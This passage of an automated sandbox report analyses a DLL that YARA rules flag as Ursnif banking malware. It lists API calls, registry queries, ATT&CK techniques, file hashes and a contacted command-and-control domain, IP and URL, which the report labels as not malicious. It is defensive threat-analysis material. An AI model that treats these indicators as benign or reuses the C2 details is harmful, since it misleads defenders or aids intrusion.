Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_6D67BE2F
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,	1_2_6D67C9EE
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	1_2_6D6781A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	4_2_6D641566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_6D67BDC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	4_2_6D67C4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_6D67BE2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,	4_2_6D67C9EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	4_2_6D6781A7

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D6417A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_6D6417A7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D64146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_6D64146C

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
presentation.dll	4%	Virustotal		Browse
presentation.dll	2%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.2f30000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://app.buboleinov.com/bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FU	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
app.buboleinov.com	34.86.224.8	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://app.buboleinov.com/bMm8AkF4K_2F_2FveRzR2f/nYi0xtk5xaARe/_2F_2Fyn/MhC_2BrW8ZBR5d6Ebe1q1AA/_2FU	{93F744B3-ADDB-11EB-90E6-ECF4BB82F7E0}.dat.21.dr, ~DF615A7858A33FDD4B.TMP.21.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.86.224.8	app.buboleinov.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404837
Start date:	05.05.2021
Start time:	12:50:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	presentation.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@12/13@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.7% (good quality ratio 4.5%) Quality average: 79.9% Quality standard deviation: 28.3%
HCA Information:	Successful, ratio: 73% Number of executed functions: 27 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.144.200, 2.20.142.209, 2.20.142.210, 13.64.90.137, 104.43.139.144, 92.122.145.220, 20.82.210.154, 88.221.62.148 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:52:56	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{93F744B1-ADDB-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7728194424765753
Encrypted:	false
SSDEEP:	96:rLZuZ62DLWj1tj3Hifj+tHjHzMeQcH7HpH6THvHB7WHsHpB:rLZuZ623WRtzifKtTzM6b56jfBCspB
MD5:	49F6B7EC57B2D00C8D6EB883B89F469B
SHA1:	71678F63F6820A1052EF0508BB36CCF1751D6B44
SHA-256:	B46B55FABE8D834E48425FC723F5BBB14FBA93D05AE4882C33809D0087ED1E89
SHA-512:	3A4FC96E8E080EDA99C7D35FF3B0C00F479A6F2C8A13D283C32D3FB82FC16CFA5EFFFEFA6F3B72CF3DB972E679AFDDD07E60E8683F1D3B113F84871BBCE07CFC
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{93F744B3-ADDB-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	28140
Entropy (8bit):	1.914272415965734
Encrypted:	false
SSDEEP:	192:rBZwQs6ek7bjN2ASWiMLNHl/SlHlu/L4A:rHJ3/LEETBMEb
MD5:	18C6CB437E09C5DA3138CFE0C12FACF3
SHA1:	8EAA0C13469F0F244A0E65371025528D0E47BCF3
SHA-256:	57276398DCB4EA94A93ACCB8E744E7F170359BFA81EE6774282F41625AC03170
SHA-512:	065779A71327E7156022DF2724660E4BDF049F4812C59975E8BFE466D5B184C7503AFB95D4665059E14DE41670BFCB7C4B70E498A017941440653FE1AABE5D39
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\ErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2168
Entropy (8bit):	5.207912016937144
Encrypted:	false
SSDEEP:	24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
MD5:	F4FE1CB77E758E1BA56B8A8EC20417C5
SHA1:	F4EDA06901EDB98633A686B11D02F4925F827BF0
SHA-256:	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
SHA-512:	62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
Malicious:	false
Reputation:	high, very likely benign file
IE Cache URL:	res://ieframe.dll/ErrorPageTemplate.css
Preview:	.body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\bullet[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	447
Entropy (8bit):	7.304718288205936
Encrypted:	false
SSDEEP:	12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
MD5:	26F971D87CA00E23BD2D064524AEF838
SHA1:	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
SHA-256:	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
SHA-512:	C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
Malicious:	false
Reputation:	high, very likely benign file
IE Cache URL:	res://ieframe.dll/bullet.png
Preview:	.PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...\|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http_404[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	6495
Entropy (8bit):	3.8998802417135856
Encrypted:	false
SSDEEP:	48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
MD5:	F65C729DC2D457B7A1093813F1253192
SHA1:	5006C9B50108CF582BE308411B157574E5A893FC
SHA-256:	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
SHA-512:	717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
Malicious:	false
IE Cache URL:	res://ieframe.dll/http_404.htm
Preview:	.<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\info_48[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4113
Entropy (8bit):	7.9370830126943375
Encrypted:	false
SSDEEP:	96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
MD5:	5565250FCC163AA3A79F0B746416CE69
SHA1:	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
SHA-256:	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
SHA-512:	E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
Malicious:	false
IE Cache URL:	res://ieframe.dll/info_48.png
Preview:	.PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..\|........7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....\|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.\|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\background_gradient[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
Category:	downloaded
Size (bytes):	453
Entropy (8bit):	5.019973044227213
Encrypted:	false
SSDEEP:	6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
MD5:	20F0110ED5E4E0D5384A496E4880139B
SHA1:	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
SHA-256:	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
SHA-512:	5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
Malicious:	false
IE Cache URL:	res://ieframe.dll/background_gradient.jpg
Preview:	......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
